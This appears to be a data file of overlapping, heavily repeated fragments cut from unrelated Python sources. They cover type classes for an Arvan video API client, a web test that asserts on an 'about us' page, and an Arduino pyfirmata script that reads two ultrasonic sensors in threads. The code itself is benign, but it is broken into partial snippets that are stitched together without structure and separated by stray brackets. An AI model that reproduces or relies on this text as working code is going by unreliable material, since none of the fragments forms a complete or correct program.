List[ConvertInfo] created_at: str", "'id' in kwargs: kwargs['video_id'] = kwargs.pop('id') del kwargs['channel'] super().__init__(**kwargs) def __str__(self): return self.title", "kwargs: kwargs['video_id'] = kwargs.pop('id') del kwargs['channel'] super().__init__(**kwargs) def __str__(self): return self.title def __repr__(self):", "# channel: Channel def __init__(self, **kwargs): if 'convert_info' in kwargs: self.convert_info = []", "hls_playlist: str dash_playlist: str thumbnail_url: str tooltip_url: str video_url: str player_url: str #", "if kwargs['audio']: self.audio = self.Audio(**kwargs['audio']) del kwargs['audio'] super().__init__(**kwargs) def __str__(self): return self.general.format or", "description: str file_info: FileInfo thumbnail_time: int status: str job_status_url: str available: bool convert_mode:", "player_url: str # channel: Channel def __init__(self, **kwargs): if 'convert_info' in kwargs: self.convert_info", "format: str bit_rate: int size: int class Video(DynamicType): codec: str width: int height:", "del kwargs['video'] if 'audio' in kwargs: if kwargs['audio']: self.audio = self.Audio(**kwargs['audio']) del kwargs['audio']", "from arvan_client.arvan.types import DynamicType class FileInfo(DynamicType): class General(DynamicType): duration: int format: str bit_rate:", "if 'audio' in kwargs: if kwargs['audio']: self.audio = self.Audio(**kwargs['audio']) del kwargs['audio'] super().__init__(**kwargs) def", "= self.Audio(**kwargs['audio']) del kwargs['audio'] super().__init__(**kwargs) def __str__(self): return self.general.format or super().__str__() class ConvertInfo(DynamicType):", "resolution: str def __str__(self): return self.resolution class Video(DynamicType): video_id: str title: str description:", "return self.general.format or super().__str__() class ConvertInfo(DynamicType): audio_bitrate: int video_bitrate: int resolution: str def", "kwargs: self.general = self.General(**kwargs['general']) del kwargs['general'] if 'video' in kwargs: if kwargs['video']: self.video", "str channel_layout: str def __init__(self, **kwargs): self.general = None self.video = None self.audio", "codec: str sample_rate: str bit_rate: str channel_layout: str def __init__(self, **kwargs): self.general =", "List[str] hls_playlist: str dash_playlist: str thumbnail_url: str tooltip_url: str video_url: str player_url: str", "__str__(self): return self.general.format or super().__str__() class ConvertInfo(DynamicType): audio_bitrate: int video_bitrate: int resolution: str", "Video(DynamicType): video_id: str title: str description: str file_info: FileInfo thumbnail_time: int status: str", "in kwargs: if isinstance(kwargs['convert_info'], list): for convert_info in kwargs['convert_info']: self.convert_info.append(ConvertInfo(**convert_info)) del kwargs['convert_info'] if", "= self.Video(**kwargs['video']) del kwargs['video'] if 'audio' in kwargs: if kwargs['audio']: self.audio = self.Audio(**kwargs['audio'])", "in kwargs: self.general = self.General(**kwargs['general']) del kwargs['general'] if 'video' in kwargs: if kwargs['video']:", "kwargs: if kwargs['audio']: self.audio = self.Audio(**kwargs['audio']) del kwargs['audio'] super().__init__(**kwargs) def __str__(self): return self.general.format", "if 'convert_info' in kwargs: self.convert_info = [] if 'convert_info' in kwargs: if isinstance(kwargs['convert_info'],", "class General(DynamicType): duration: int format: str bit_rate: int size: int class Video(DynamicType): codec:", "None self.audio = None if 'general' in kwargs: self.general = self.General(**kwargs['general']) del kwargs['general']", "__init__(self, **kwargs): if 'convert_info' in kwargs: self.convert_info = [] if 'convert_info' in kwargs:", "self.Audio(**kwargs['audio']) del kwargs['audio'] super().__init__(**kwargs) def __str__(self): return self.general.format or super().__str__() class ConvertInfo(DynamicType): audio_bitrate:", "if 'video' in kwargs: if kwargs['video']: self.video = self.Video(**kwargs['video']) del kwargs['video'] if 'audio'", "str completed_at: str parallel_convert: int directory_size: str config_url: str mp4_videos: List[str] hls_playlist: str", "convert_info in kwargs['convert_info']: self.convert_info.append(ConvertInfo(**convert_info)) del kwargs['convert_info'] if 'mp4_videos' in kwargs: self.mp4_videos = kwargs['mp4_videos']", "typing import List from arvan_client.arvan.types import DynamicType class FileInfo(DynamicType): class General(DynamicType): duration: int", "int height: int frame_rate: str bit_rate: str class Audio(DynamicType): codec: str sample_rate: str", "del kwargs['audio'] super().__init__(**kwargs) def __str__(self): return self.general.format or super().__str__() class ConvertInfo(DynamicType): audio_bitrate: int", "'convert_info' in kwargs: if isinstance(kwargs['convert_info'], list): for convert_info in kwargs['convert_info']: self.convert_info.append(ConvertInfo(**convert_info)) del kwargs['convert_info']", "video_url: str player_url: str # channel: Channel def __init__(self, **kwargs): if 'convert_info' in", "[] if 'convert_info' in kwargs: if isinstance(kwargs['convert_info'], list): for convert_info in kwargs['convert_info']: self.convert_info.append(ConvertInfo(**convert_info))", "DynamicType class FileInfo(DynamicType): class General(DynamicType): duration: int format: str bit_rate: int size: int", "kwargs: self.mp4_videos = kwargs['mp4_videos'] del kwargs['mp4_videos'] if 'id' in kwargs: kwargs['video_id'] = kwargs.pop('id')", "'mp4_videos' in kwargs: self.mp4_videos = kwargs['mp4_videos'] del kwargs['mp4_videos'] if 'id' in kwargs: kwargs['video_id']", "bool convert_mode: str convert_info: List[ConvertInfo] created_at: str updated_at: str completed_at: str parallel_convert: int", "sample_rate: str bit_rate: str channel_layout: str def __init__(self, **kwargs): self.general = None self.video", "str description: str file_info: FileInfo thumbnail_time: int status: str job_status_url: str available: bool", "width: int height: int frame_rate: str bit_rate: str class Audio(DynamicType): codec: str sample_rate:", "str player_url: str # channel: Channel def __init__(self, **kwargs): if 'convert_info' in kwargs:", "str video_url: str player_url: str # channel: Channel def __init__(self, **kwargs): if 'convert_info'", "kwargs['mp4_videos'] del kwargs['mp4_videos'] if 'id' in kwargs: kwargs['video_id'] = kwargs.pop('id') del kwargs['channel'] super().__init__(**kwargs)", "isinstance(kwargs['convert_info'], list): for convert_info in kwargs['convert_info']: self.convert_info.append(ConvertInfo(**convert_info)) del kwargs['convert_info'] if 'mp4_videos' in kwargs:", "str available: bool convert_mode: str convert_info: List[ConvertInfo] created_at: str updated_at: str completed_at: str", "duration: int format: str bit_rate: int size: int class Video(DynamicType): codec: str width:", "del kwargs['general'] if 'video' in kwargs: if kwargs['video']: self.video = self.Video(**kwargs['video']) del kwargs['video']", "__init__(self, **kwargs): self.general = None self.video = None self.audio = None if 'general'", "str file_info: FileInfo thumbnail_time: int status: str job_status_url: str available: bool convert_mode: str", "int size: int class Video(DynamicType): codec: str width: int height: int frame_rate: str", "str sample_rate: str bit_rate: str channel_layout: str def __init__(self, **kwargs): self.general = None", "self.general = None self.video = None self.audio = None if 'general' in kwargs:", "Audio(DynamicType): codec: str sample_rate: str bit_rate: str channel_layout: str def __init__(self, **kwargs): self.general", "= kwargs.pop('id') del kwargs['channel'] super().__init__(**kwargs) def __str__(self): return self.title def __repr__(self): return self.__str__()", "codec: str width: int height: int frame_rate: str bit_rate: str class Audio(DynamicType): codec:", "from typing import List from arvan_client.arvan.types import DynamicType class FileInfo(DynamicType): class General(DynamicType): duration:", "if 'id' in kwargs: kwargs['video_id'] = kwargs.pop('id') del kwargs['channel'] super().__init__(**kwargs) def __str__(self): return", "if 'convert_info' in kwargs: if isinstance(kwargs['convert_info'], list): for convert_info in kwargs['convert_info']: self.convert_info.append(ConvertInfo(**convert_info)) del", "height: int frame_rate: str bit_rate: str class Audio(DynamicType): codec: str sample_rate: str bit_rate:", "'general' in kwargs: self.general = self.General(**kwargs['general']) del kwargs['general'] if 'video' in kwargs: if", "if 'general' in kwargs: self.general = self.General(**kwargs['general']) del kwargs['general'] if 'video' in kwargs:", "List from arvan_client.arvan.types import DynamicType class FileInfo(DynamicType): class General(DynamicType): duration: int format: str", "str title: str description: str file_info: FileInfo thumbnail_time: int status: str job_status_url: str", "kwargs['video_id'] = kwargs.pop('id') del kwargs['channel'] super().__init__(**kwargs) def __str__(self): return self.title def __repr__(self): return", "kwargs['audio'] super().__init__(**kwargs) def __str__(self): return self.general.format or super().__str__() class ConvertInfo(DynamicType): audio_bitrate: int video_bitrate:", "in kwargs: kwargs['video_id'] = kwargs.pop('id') del kwargs['channel'] super().__init__(**kwargs) def __str__(self): return self.title def", "in kwargs: if kwargs['video']: self.video = self.Video(**kwargs['video']) del kwargs['video'] if 'audio' in kwargs:", "mp4_videos: List[str] hls_playlist: str dash_playlist: str thumbnail_url: str tooltip_url: str video_url: str player_url:", "kwargs['video']: self.video = self.Video(**kwargs['video']) del kwargs['video'] if 'audio' in kwargs: if kwargs['audio']: self.audio", "self.Video(**kwargs['video']) del kwargs['video'] if 'audio' in kwargs: if kwargs['audio']: self.audio = self.Audio(**kwargs['audio']) del", "FileInfo thumbnail_time: int status: str job_status_url: str available: bool convert_mode: str convert_info: List[ConvertInfo]", "str parallel_convert: int directory_size: str config_url: str mp4_videos: List[str] hls_playlist: str dash_playlist: str", "FileInfo(DynamicType): class General(DynamicType): duration: int format: str bit_rate: int size: int class Video(DynamicType):", "config_url: str mp4_videos: List[str] hls_playlist: str dash_playlist: str thumbnail_url: str tooltip_url: str video_url:", "if isinstance(kwargs['convert_info'], list): for convert_info in kwargs['convert_info']: self.convert_info.append(ConvertInfo(**convert_info)) del kwargs['convert_info'] if 'mp4_videos' in", "= None self.audio = None if 'general' in kwargs: self.general = self.General(**kwargs['general']) del", "Channel def __init__(self, **kwargs): if 'convert_info' in kwargs: self.convert_info = [] if 'convert_info'" ]
[]
[ "AboutUsTestCase(BaseUser): def test_about_us(self): response = self.client.get(\"/about-us\") self.assertIn( b\"Welcome to SetNow, We're dedicated to", "effort was made under the guidence of Prof. <NAME>.\", response.data, ) self.assertIn(b\"Our Team\",", "= self.client.get(\"/about-us\") self.assertIn( b\"Welcome to SetNow, We're dedicated to giving you the very", "def test_about_us(self): response = self.client.get(\"/about-us\") self.assertIn( b\"Welcome to SetNow, We're dedicated to giving", "our service.\", response.data, ) self.assertIn( b\"This website is created by students of DA-IICT", "Gujrat).\", response.data, ) self.assertIn( b\"This effort was made under the guidence of Prof.", "response.data, ) self.assertIn(b\"Our Team\", response.data) self.assertIn(b\"<NAME> [201701184]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701191]\",", "response.data) self.assertIn(b\"<NAME> [201701191]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701203]\", response.data) self.assertIn(b\"Quality assurance engineer\",", "of Prof. <NAME>.\", response.data, ) self.assertIn(b\"Our Team\", response.data) self.assertIn(b\"<NAME> [201701184]\", response.data) self.assertIn(b\"UI/UX designer\",", "self.assertIn( b\"This effort was made under the guidence of Prof. <NAME>.\", response.data, )", "you the very best of our service.\", response.data, ) self.assertIn( b\"This website is", "best of our service.\", response.data, ) self.assertIn( b\"This website is created by students", "Team\", response.data) self.assertIn(b\"<NAME> [201701184]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701191]\", response.data) self.assertIn(b\"UI/UX designer\",", "response.data) self.assertIn(b\"<NAME> [201701184]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701191]\", response.data) self.assertIn(b\"UI/UX designer\", response.data)", "designer\", response.data) self.assertIn(b\"<NAME> [201701191]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701203]\", response.data) self.assertIn(b\"Quality assurance", "self.assertIn( b\"This website is created by students of DA-IICT (Gandhinagar, Gujrat).\", response.data, )", ") self.assertIn( b\"This website is created by students of DA-IICT (Gandhinagar, Gujrat).\", response.data,", "service.\", response.data, ) self.assertIn( b\"This website is created by students of DA-IICT (Gandhinagar,", "[201701191]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701203]\", response.data) self.assertIn(b\"Quality assurance engineer\", response.data) self.assertIn(b\"Team", "test_about_us(self): response = self.client.get(\"/about-us\") self.assertIn( b\"Welcome to SetNow, We're dedicated to giving you", "by students of DA-IICT (Gandhinagar, Gujrat).\", response.data, ) self.assertIn( b\"This effort was made", "created by students of DA-IICT (Gandhinagar, Gujrat).\", response.data, ) self.assertIn( b\"This effort was", "SetNow, We're dedicated to giving you the very best of our service.\", response.data,", "<NAME>.\", response.data, ) self.assertIn(b\"Our Team\", response.data) self.assertIn(b\"<NAME> [201701184]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME>", "self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701203]\", response.data) self.assertIn(b\"Quality assurance engineer\", response.data) self.assertIn(b\"Team Back-end\", response.data)", "to SetNow, We're dedicated to giving you the very best of our service.\",", "We're dedicated to giving you the very best of our service.\", response.data, )", "is created by students of DA-IICT (Gandhinagar, Gujrat).\", response.data, ) self.assertIn( b\"This effort", "from test.main.base_classes import BaseUser from test.main.utils import test_post_request class AboutUsTestCase(BaseUser): def test_about_us(self): response", "self.assertIn(b\"<NAME> [201701184]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701191]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME>", "BaseUser from test.main.utils import test_post_request class AboutUsTestCase(BaseUser): def test_about_us(self): response = self.client.get(\"/about-us\") self.assertIn(", "class AboutUsTestCase(BaseUser): def test_about_us(self): response = self.client.get(\"/about-us\") self.assertIn( b\"Welcome to SetNow, We're dedicated", "self.assertIn(b\"Our Team\", response.data) self.assertIn(b\"<NAME> [201701184]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701191]\", response.data) self.assertIn(b\"UI/UX", "flaskapp import models from test.main.base_classes import BaseUser from test.main.utils import test_post_request class AboutUsTestCase(BaseUser):", "models from test.main.base_classes import BaseUser from test.main.utils import test_post_request class AboutUsTestCase(BaseUser): def test_about_us(self):", "dedicated to giving you the very best of our service.\", response.data, ) self.assertIn(", "to giving you the very best of our service.\", response.data, ) self.assertIn( b\"This", "was made under the guidence of Prof. <NAME>.\", response.data, ) self.assertIn(b\"Our Team\", response.data)", "response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701203]\", response.data) self.assertIn(b\"Quality assurance engineer\", response.data) self.assertIn(b\"Team Back-end\",", "of DA-IICT (Gandhinagar, Gujrat).\", response.data, ) self.assertIn( b\"This effort was made under the", "b\"This effort was made under the guidence of Prof. <NAME>.\", response.data, ) self.assertIn(b\"Our", "made under the guidence of Prof. <NAME>.\", response.data, ) self.assertIn(b\"Our Team\", response.data) self.assertIn(b\"<NAME>", "response.data, ) self.assertIn( b\"This effort was made under the guidence of Prof. <NAME>.\",", "very best of our service.\", response.data, ) self.assertIn( b\"This website is created by", "import test_post_request class AboutUsTestCase(BaseUser): def test_about_us(self): response = self.client.get(\"/about-us\") self.assertIn( b\"Welcome to SetNow,", "guidence of Prof. <NAME>.\", response.data, ) self.assertIn(b\"Our Team\", response.data) self.assertIn(b\"<NAME> [201701184]\", response.data) self.assertIn(b\"UI/UX", "self.assertIn( b\"Welcome to SetNow, We're dedicated to giving you the very best of", "[201701184]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701191]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701203]\",", "the guidence of Prof. <NAME>.\", response.data, ) self.assertIn(b\"Our Team\", response.data) self.assertIn(b\"<NAME> [201701184]\", response.data)", "response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701191]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701203]\", response.data)", "the very best of our service.\", response.data, ) self.assertIn( b\"This website is created", "DA-IICT (Gandhinagar, Gujrat).\", response.data, ) self.assertIn( b\"This effort was made under the guidence", "under the guidence of Prof. <NAME>.\", response.data, ) self.assertIn(b\"Our Team\", response.data) self.assertIn(b\"<NAME> [201701184]\",", "test.main.base_classes import BaseUser from test.main.utils import test_post_request class AboutUsTestCase(BaseUser): def test_about_us(self): response =", "test.main.utils import test_post_request class AboutUsTestCase(BaseUser): def test_about_us(self): response = self.client.get(\"/about-us\") self.assertIn( b\"Welcome to", "self.client.get(\"/about-us\") self.assertIn( b\"Welcome to SetNow, We're dedicated to giving you the very best", "b\"This website is created by students of DA-IICT (Gandhinagar, Gujrat).\", response.data, ) self.assertIn(", "students of DA-IICT (Gandhinagar, Gujrat).\", response.data, ) self.assertIn( b\"This effort was made under", "from flaskapp import models from test.main.base_classes import BaseUser from test.main.utils import test_post_request class", "self.assertIn(b\"<NAME> [201701191]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701203]\", response.data) self.assertIn(b\"Quality assurance engineer\", response.data)", ") self.assertIn(b\"Our Team\", response.data) self.assertIn(b\"<NAME> [201701184]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701191]\", response.data)", "giving you the very best of our service.\", response.data, ) self.assertIn( b\"This website", "b\"Welcome to SetNow, We're dedicated to giving you the very best of our", "response.data, ) self.assertIn( b\"This website is created by students of DA-IICT (Gandhinagar, Gujrat).\",", "import BaseUser from test.main.utils import test_post_request class AboutUsTestCase(BaseUser): def test_about_us(self): response = self.client.get(\"/about-us\")", "from test.main.utils import test_post_request class AboutUsTestCase(BaseUser): def test_about_us(self): response = self.client.get(\"/about-us\") self.assertIn( b\"Welcome", "test_post_request class AboutUsTestCase(BaseUser): def test_about_us(self): response = self.client.get(\"/about-us\") self.assertIn( b\"Welcome to SetNow, We're", "website is created by students of DA-IICT (Gandhinagar, Gujrat).\", response.data, ) self.assertIn( b\"This", "of our service.\", response.data, ) self.assertIn( b\"This website is created by students of", "(Gandhinagar, Gujrat).\", response.data, ) self.assertIn( b\"This effort was made under the guidence of", ") self.assertIn( b\"This effort was made under the guidence of Prof. <NAME>.\", response.data,", "response = self.client.get(\"/about-us\") self.assertIn( b\"Welcome to SetNow, We're dedicated to giving you the", "Prof. <NAME>.\", response.data, ) self.assertIn(b\"Our Team\", response.data) self.assertIn(b\"<NAME> [201701184]\", response.data) self.assertIn(b\"UI/UX designer\", response.data)", "self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701191]\", response.data) self.assertIn(b\"UI/UX designer\", response.data) self.assertIn(b\"<NAME> [201701203]\", response.data) self.assertIn(b\"Quality", "import models from test.main.base_classes import BaseUser from test.main.utils import test_post_request class AboutUsTestCase(BaseUser): def" ]
[ "digital pin 7 OUTPUT sonarEcho2 = board.get_pin('d:8:o') ## digital pin 8 OUTPUT time.sleep(1)", "set pins class Echo(Thread): def __init__ (self, echoPino, text:str=None): Thread.__init__(self) self.echoPino = echoPino", "1: port 7 text_sonar1 = \"sonar1: Time: {0}ms, distance: {1}cm\" inicioEcho1 = Echo(sonarEcho1,", "Arduino(port) define board print(\"Communication successfully started!\") it = util.Iterator(board) it.start() ## Note: Echo", "= board.get_pin('d:8:o') ## digital pin 8 OUTPUT time.sleep(1) ### End set pins class", "datasheet distance = ping_time_to_distance(time) print(f\"{self.text}\".format(time, distance)) ##Sonar 1: port 7 text_sonar1 = \"sonar1:", "ping_time_to_distance(time) print(f\"{self.text}\".format(time, distance)) ##Sonar 1: port 7 text_sonar1 = \"sonar1: Time: {0}ms, distance:", "distance = ping_time_to_distance(time) print(f\"{self.text}\".format(time, distance)) ##Sonar 1: port 7 text_sonar1 = \"sonar1: Time:", "= ping_time_to_distance(time) print(f\"{self.text}\".format(time, distance)) ##Sonar 1: port 7 text_sonar1 = \"sonar1: Time: {0}ms,", "pyfirmata import Arduino, pyfirmata, util from pyfirmata.util import ping_time_to_distance import time ### Start", "Thread from pyfirmata import Arduino, pyfirmata, util from pyfirmata.util import ping_time_to_distance import time", "Arduino() # or Arduino(port) define board print(\"Communication successfully started!\") it = util.Iterator(board) it.start()", "board = Arduino() # or Arduino(port) define board print(\"Communication successfully started!\") it =", "it = util.Iterator(board) it.start() ## Note: Echo and Trigger pins connected to the", "board.get_pin('d:7:o') ## digital pin 7 OUTPUT sonarEcho2 = board.get_pin('d:8:o') ## digital pin 8", "time = self.echoPino.ping() board.pass_time(0.06) #delay of 60ms -> see datasheet distance = ping_time_to_distance(time)", "sonarEcho1 = board.get_pin('d:7:o') ## digital pin 7 OUTPUT sonarEcho2 = board.get_pin('d:8:o') ## digital", "port 7 text_sonar1 = \"sonar1: Time: {0}ms, distance: {1}cm\" inicioEcho1 = Echo(sonarEcho1, text_sonar1)", "Time: {0}ms, distance: {1}cm\" inicioEcho1 = Echo(sonarEcho1, text_sonar1) inicioEcho1.start() ##Sonar 2: port 8", "text def run(self): while True: time = self.echoPino.ping() board.pass_time(0.06) #delay of 60ms ->", "run(self): while True: time = self.echoPino.ping() board.pass_time(0.06) #delay of 60ms -> see datasheet", "pins class Echo(Thread): def __init__ (self, echoPino, text:str=None): Thread.__init__(self) self.echoPino = echoPino self.text", "import time ### Start of pin configuration board = Arduino() # or Arduino(port)", "util.Iterator(board) it.start() ## Note: Echo and Trigger pins connected to the same ports", "def run(self): while True: time = self.echoPino.ping() board.pass_time(0.06) #delay of 60ms -> see", "board print(\"Communication successfully started!\") it = util.Iterator(board) it.start() ## Note: Echo and Trigger", "inicioEcho1.start() ##Sonar 2: port 8 text_sonar2 = \"sonar2: Time: {0}ms, distance: {1}cm\" inicioEcho2", "connected to the same ports sonarEcho1 = board.get_pin('d:7:o') ## digital pin 7 OUTPUT", "= \"sonar1: Time: {0}ms, distance: {1}cm\" inicioEcho1 = Echo(sonarEcho1, text_sonar1) inicioEcho1.start() ##Sonar 2:", "8 OUTPUT time.sleep(1) ### End set pins class Echo(Thread): def __init__ (self, echoPino,", "{1}cm\" inicioEcho1 = Echo(sonarEcho1, text_sonar1) inicioEcho1.start() ##Sonar 2: port 8 text_sonar2 = \"sonar2:", "pin 8 OUTPUT time.sleep(1) ### End set pins class Echo(Thread): def __init__ (self,", "or Arduino(port) define board print(\"Communication successfully started!\") it = util.Iterator(board) it.start() ## Note:", "import Arduino, pyfirmata, util from pyfirmata.util import ping_time_to_distance import time ### Start of", "print(f\"{self.text}\".format(time, distance)) ##Sonar 1: port 7 text_sonar1 = \"sonar1: Time: {0}ms, distance: {1}cm\"", "# or Arduino(port) define board print(\"Communication successfully started!\") it = util.Iterator(board) it.start() ##", "End set pins class Echo(Thread): def __init__ (self, echoPino, text:str=None): Thread.__init__(self) self.echoPino =", "configuration board = Arduino() # or Arduino(port) define board print(\"Communication successfully started!\") it", "## digital pin 7 OUTPUT sonarEcho2 = board.get_pin('d:8:o') ## digital pin 8 OUTPUT", "### End set pins class Echo(Thread): def __init__ (self, echoPino, text:str=None): Thread.__init__(self) self.echoPino", "class Echo(Thread): def __init__ (self, echoPino, text:str=None): Thread.__init__(self) self.echoPino = echoPino self.text =", "text:str=None): Thread.__init__(self) self.echoPino = echoPino self.text = text def run(self): while True: time", "{0}ms, distance: {1}cm\" inicioEcho1 = Echo(sonarEcho1, text_sonar1) inicioEcho1.start() ##Sonar 2: port 8 text_sonar2", "<reponame>BosonsHiggs/arduPython ## See Figures/two_ultrassonics_thread.png from threading import Thread from pyfirmata import Arduino, pyfirmata,", "pyfirmata.util import ping_time_to_distance import time ### Start of pin configuration board = Arduino()", "threading import Thread from pyfirmata import Arduino, pyfirmata, util from pyfirmata.util import ping_time_to_distance", "7 OUTPUT sonarEcho2 = board.get_pin('d:8:o') ## digital pin 8 OUTPUT time.sleep(1) ### End", "pyfirmata, util from pyfirmata.util import ping_time_to_distance import time ### Start of pin configuration", "= text def run(self): while True: time = self.echoPino.ping() board.pass_time(0.06) #delay of 60ms", "text_sonar1 = \"sonar1: Time: {0}ms, distance: {1}cm\" inicioEcho1 = Echo(sonarEcho1, text_sonar1) inicioEcho1.start() ##Sonar", "##Sonar 2: port 8 text_sonar2 = \"sonar2: Time: {0}ms, distance: {1}cm\" inicioEcho2 =", "OUTPUT time.sleep(1) ### End set pins class Echo(Thread): def __init__ (self, echoPino, text:str=None):", "import Thread from pyfirmata import Arduino, pyfirmata, util from pyfirmata.util import ping_time_to_distance import", "= echoPino self.text = text def run(self): while True: time = self.echoPino.ping() board.pass_time(0.06)", "Note: Echo and Trigger pins connected to the same ports sonarEcho1 = board.get_pin('d:7:o')", "= Echo(sonarEcho1, text_sonar1) inicioEcho1.start() ##Sonar 2: port 8 text_sonar2 = \"sonar2: Time: {0}ms,", "ping_time_to_distance import time ### Start of pin configuration board = Arduino() # or", "it.start() ## Note: Echo and Trigger pins connected to the same ports sonarEcho1", "while True: time = self.echoPino.ping() board.pass_time(0.06) #delay of 60ms -> see datasheet distance", "OUTPUT sonarEcho2 = board.get_pin('d:8:o') ## digital pin 8 OUTPUT time.sleep(1) ### End set", "2: port 8 text_sonar2 = \"sonar2: Time: {0}ms, distance: {1}cm\" inicioEcho2 = Echo(sonarEcho2,", "pins connected to the same ports sonarEcho1 = board.get_pin('d:7:o') ## digital pin 7", "import ping_time_to_distance import time ### Start of pin configuration board = Arduino() #", "Echo and Trigger pins connected to the same ports sonarEcho1 = board.get_pin('d:7:o') ##", "sonarEcho2 = board.get_pin('d:8:o') ## digital pin 8 OUTPUT time.sleep(1) ### End set pins", "self.text = text def run(self): while True: time = self.echoPino.ping() board.pass_time(0.06) #delay of", "inicioEcho1 = Echo(sonarEcho1, text_sonar1) inicioEcho1.start() ##Sonar 2: port 8 text_sonar2 = \"sonar2: Time:", "Figures/two_ultrassonics_thread.png from threading import Thread from pyfirmata import Arduino, pyfirmata, util from pyfirmata.util", "Thread.__init__(self) self.echoPino = echoPino self.text = text def run(self): while True: time =", "to the same ports sonarEcho1 = board.get_pin('d:7:o') ## digital pin 7 OUTPUT sonarEcho2", "### Start of pin configuration board = Arduino() # or Arduino(port) define board", "the same ports sonarEcho1 = board.get_pin('d:7:o') ## digital pin 7 OUTPUT sonarEcho2 =", "60ms -> see datasheet distance = ping_time_to_distance(time) print(f\"{self.text}\".format(time, distance)) ##Sonar 1: port 7", "= Arduino() # or Arduino(port) define board print(\"Communication successfully started!\") it = util.Iterator(board)", "Start of pin configuration board = Arduino() # or Arduino(port) define board print(\"Communication", "= util.Iterator(board) it.start() ## Note: Echo and Trigger pins connected to the same", "= self.echoPino.ping() board.pass_time(0.06) #delay of 60ms -> see datasheet distance = ping_time_to_distance(time) print(f\"{self.text}\".format(time,", "See Figures/two_ultrassonics_thread.png from threading import Thread from pyfirmata import Arduino, pyfirmata, util from", "## digital pin 8 OUTPUT time.sleep(1) ### End set pins class Echo(Thread): def", "from threading import Thread from pyfirmata import Arduino, pyfirmata, util from pyfirmata.util import", "Trigger pins connected to the same ports sonarEcho1 = board.get_pin('d:7:o') ## digital pin", "board.pass_time(0.06) #delay of 60ms -> see datasheet distance = ping_time_to_distance(time) print(f\"{self.text}\".format(time, distance)) ##Sonar", "Echo(sonarEcho1, text_sonar1) inicioEcho1.start() ##Sonar 2: port 8 text_sonar2 = \"sonar2: Time: {0}ms, distance:", "text_sonar1) inicioEcho1.start() ##Sonar 2: port 8 text_sonar2 = \"sonar2: Time: {0}ms, distance: {1}cm\"", "from pyfirmata.util import ping_time_to_distance import time ### Start of pin configuration board =", "of pin configuration board = Arduino() # or Arduino(port) define board print(\"Communication successfully", "util from pyfirmata.util import ping_time_to_distance import time ### Start of pin configuration board", "__init__ (self, echoPino, text:str=None): Thread.__init__(self) self.echoPino = echoPino self.text = text def run(self):", "from pyfirmata import Arduino, pyfirmata, util from pyfirmata.util import ping_time_to_distance import time ###", "digital pin 8 OUTPUT time.sleep(1) ### End set pins class Echo(Thread): def __init__", "pin 7 OUTPUT sonarEcho2 = board.get_pin('d:8:o') ## digital pin 8 OUTPUT time.sleep(1) ###", "#delay of 60ms -> see datasheet distance = ping_time_to_distance(time) print(f\"{self.text}\".format(time, distance)) ##Sonar 1:", "time ### Start of pin configuration board = Arduino() # or Arduino(port) define", "see datasheet distance = ping_time_to_distance(time) print(f\"{self.text}\".format(time, distance)) ##Sonar 1: port 7 text_sonar1 =", "echoPino, text:str=None): Thread.__init__(self) self.echoPino = echoPino self.text = text def run(self): while True:", "##Sonar 1: port 7 text_sonar1 = \"sonar1: Time: {0}ms, distance: {1}cm\" inicioEcho1 =", "and Trigger pins connected to the same ports sonarEcho1 = board.get_pin('d:7:o') ## digital", "print(\"Communication successfully started!\") it = util.Iterator(board) it.start() ## Note: Echo and Trigger pins", "distance)) ##Sonar 1: port 7 text_sonar1 = \"sonar1: Time: {0}ms, distance: {1}cm\" inicioEcho1", "(self, echoPino, text:str=None): Thread.__init__(self) self.echoPino = echoPino self.text = text def run(self): while", "Arduino, pyfirmata, util from pyfirmata.util import ping_time_to_distance import time ### Start of pin", "## See Figures/two_ultrassonics_thread.png from threading import Thread from pyfirmata import Arduino, pyfirmata, util", "successfully started!\") it = util.Iterator(board) it.start() ## Note: Echo and Trigger pins connected", "self.echoPino = echoPino self.text = text def run(self): while True: time = self.echoPino.ping()", "port 8 text_sonar2 = \"sonar2: Time: {0}ms, distance: {1}cm\" inicioEcho2 = Echo(sonarEcho2, text_sonar2)", "## Note: Echo and Trigger pins connected to the same ports sonarEcho1 =", "8 text_sonar2 = \"sonar2: Time: {0}ms, distance: {1}cm\" inicioEcho2 = Echo(sonarEcho2, text_sonar2) inicioEcho2.start()", "True: time = self.echoPino.ping() board.pass_time(0.06) #delay of 60ms -> see datasheet distance =", "same ports sonarEcho1 = board.get_pin('d:7:o') ## digital pin 7 OUTPUT sonarEcho2 = board.get_pin('d:8:o')", "define board print(\"Communication successfully started!\") it = util.Iterator(board) it.start() ## Note: Echo and", "started!\") it = util.Iterator(board) it.start() ## Note: Echo and Trigger pins connected to", "-> see datasheet distance = ping_time_to_distance(time) print(f\"{self.text}\".format(time, distance)) ##Sonar 1: port 7 text_sonar1", "= board.get_pin('d:7:o') ## digital pin 7 OUTPUT sonarEcho2 = board.get_pin('d:8:o') ## digital pin", "distance: {1}cm\" inicioEcho1 = Echo(sonarEcho1, text_sonar1) inicioEcho1.start() ##Sonar 2: port 8 text_sonar2 =", "def 